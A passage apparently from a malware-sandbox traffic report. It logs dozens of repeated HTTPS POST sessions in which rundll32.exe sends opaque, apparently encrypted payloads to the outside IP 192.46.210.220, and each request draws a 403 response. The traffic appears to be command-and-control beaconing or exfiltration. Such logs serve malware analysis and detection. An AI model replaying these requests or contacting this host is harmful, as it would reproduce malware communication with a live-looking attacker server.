                                                                                                      2021-10-28 03:03:43 UTC274OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:43 UTC279INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      56192.168.2.450070192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:45 UTC279OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:45 UTC279OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:46 UTC284INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:45 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      57192.168.2.450074192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:47 UTC284OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:47 UTC284OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:48 UTC289INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:48 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      58192.168.2.450078192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:49 UTC289OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:49 UTC289OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:49 UTC294INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:49 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      59192.168.2.450082192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:51 UTC294OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:51 UTC294OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:52 UTC299INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:52 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.449800192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:01 UTC29OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:01 UTC30OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:02 UTC34INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      60192.168.2.450086192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:53 UTC299OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:53 UTC299OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:53 UTC304INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:53 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      61192.168.2.450090192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:55 UTC304OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:55 UTC304OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:55 UTC309INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:55 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      62192.168.2.450094192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:56 UTC309OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:56 UTC309OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:57 UTC314INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:57 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      63192.168.2.450098192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:59 UTC314OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:59 UTC314OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:59 UTC319INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:59 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      64192.168.2.450102192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:00 UTC319OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:00 UTC319OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:01 UTC324INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:01 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      65192.168.2.450106192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:02 UTC324OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:02 UTC324OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:03 UTC329INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:03 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      66192.168.2.450110192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:04 UTC329OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:04 UTC329OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:05 UTC334INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:05 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      67192.168.2.450114192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:06 UTC334OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
